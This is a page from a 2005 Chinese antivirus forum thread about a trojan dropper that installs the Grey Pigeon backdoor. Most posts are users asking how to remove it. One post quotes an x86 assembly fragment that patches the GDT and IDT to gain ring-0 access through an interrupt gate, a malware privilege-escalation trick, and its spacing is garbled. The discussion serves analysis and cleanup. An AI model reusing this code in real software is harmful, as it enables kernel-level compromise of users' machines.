瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 Dropper.Delf.av将“灰鸽子2.0”引入系统

123456   2  /  6  页   跳转

Dropper.Delf.av将“灰鸽子2.0”引入系统

收藏
q3zz
头像
初生襁褓狮
  • 帖子:289
  • 注册: 2003-10-26
  • 来自:
发表于: 2005-08-26 15:48 | 短消息 资料
字号: 11楼

startup:                             
                                pushfd
pushad
pushedx
sgdt  [esp-2]
popedx
moveax,edx ;EDX.EAX->GDT BASE
movecx, 3e8h
.ifdword ptr [eax+ecx+4]!=00cf9a00h ;3e8 ring0 code32
movbyte ptr [eax],0c3h ;ret
movdword ptr [eax+ecx],0000ffffh
movdword ptr [eax+ecx+4],00cf9a00h
.endif
push edx
sidt  [esp-2]
pop edx
add edx,HOOKINT*8 ;edx->int 20h
.ifdword ptr [edx+2]!=0ee0003e8h;int 20 gate ->gdt base(ret)
movdword ptr[edx+2],0ee0003e8h
mov[edx],ax
shreax, 16
mov[edx+6], ax
.endif
popad
popfd
xoreax, eax
ret8
endstartup
gototop
 
xjt999
头像
快乐黄口狮
  • 帖子:186
  • 注册: 2005-07-08
  • 来自:
发表于: 2005-08-26 16:21 | 短消息 资料
字号: 12楼

真是防不胜防啊
gototop
 
从头爱你
头像
锋芒艾服狮
  • 帖子:1791
  • 注册: 2005-06-17
  • 来自:
发表于: 2005-08-26 16:27 | 短消息 资料
字号: 13楼

.....这里的斑竹镇强悍
.....


.....
都是什么人物阿````
gototop
 
小冰55
头像
初生襁褓狮
  • 帖子:30
  • 注册: 2005-07-01
  • 来自:
发表于: 2005-08-26 16:34 | 短消息 资料
字号: 14楼

班竹在吗?我刚才中了,可是请问Icesword是什么呀?
                          我的进程中只有EXPLORER.EXE
                          在你们所说的目录中找不到你们所说
                          那几个文件,注册表中也没有,
          但是一开机杀内存时又会杀出这个病毒来,请问我要  怎么办?谢谢
gototop
 
baohe
头像
大版主
  • 帖子:72578
  • 注册: 2003-04-10
  • 来自:
年度优秀版主奖端午辟邪香囊卡卡名人堂就爱不长大论坛9周年纪念09欢乐圣诞十周年年度风云人物2012我眼中的你们茶馆劳模瑞星金牌用户十一周年勋章
发表于: 2005-08-26 16:43 | 只看楼主 短消息 资料
字号: 15楼

引用:
【小冰55的贴子】班竹在吗?我刚才中了,可是请问Icesword是什么呀?
                          我的进程中只有EXPLORER.EXE
                          在你们所说的目录中找不到你们所说
                          那几个文件,注册表中也没有,
          但是一开机杀内存时又会杀出这个病毒来,请问我要  怎么办?谢谢
...........................

1、IceSword是个很棒的工具。但是,新手使用时要谨慎。这个工具就在下面这个帖子第3楼的附件中:
http://forum.ikaka.com/topic.asp?board=28&artid=6979213
2、木马、病毒文件多位隐藏文件。要找到它们,必须先设置好“文件夹选项”(显示隐藏文件和系统文件)。
gototop
 
小冰55
头像
初生襁褓狮
  • 帖子:30
  • 注册: 2005-07-01
  • 来自:
发表于: 2005-08-26 16:48 | 短消息 资料
字号: 16楼

搞了一下午为这个病毒,都搞不定,我再去找。可不可加我QQ呀,先谢谢了,34027391,谢谢谢谢
gototop
 
命运里の金色
头像
社区嘉宾
  • 帖子:11442
  • 注册: 2005-01-01
  • 来自:
发表于: 2005-08-26 16:56 | 短消息 资料
字号: 17楼

下载试下,现在的木马呀,真是....什么都有
gototop
 
小冰55
头像
初生襁褓狮
  • 帖子:30
  • 注册: 2005-07-01
  • 来自:
发表于: 2005-08-26 16:56 | 短消息 资料
字号: 18楼

还是搜不出,杀也杀不到,重新开机就出现病毒,晕掉呀
gototop
 
carey00
头像
初生襁褓狮
  • 帖子:2
  • 注册: 2005-08-26
  • 来自:
发表于: 2005-08-26 20:11 | 短消息 资料
字号: 19楼

汗死,我中了这个毒,用瑞星杀完重启后还有,用楼主的方法手动杀,可是找不到WINDOWS和SYSTEM下的要删除的文件,我已经选择了显示所有文件和文件夹,到注册表里也找不到要删除的两个键,谁杀成功了呢,请帮忙下吧
gototop
 
花落花又开
头像
社区嘉宾
  • 帖子:6782
  • 注册: 2005-04-16
  • 来自:
发表于: 2005-08-26 21:31 | 短消息 资料
字号: 20楼

系统直接被开了个“后门”
gototop
 
<<上一主题|下一主题>>
123456   2  /  6  页   跳转
页面顶部
Powered by Discuz!NT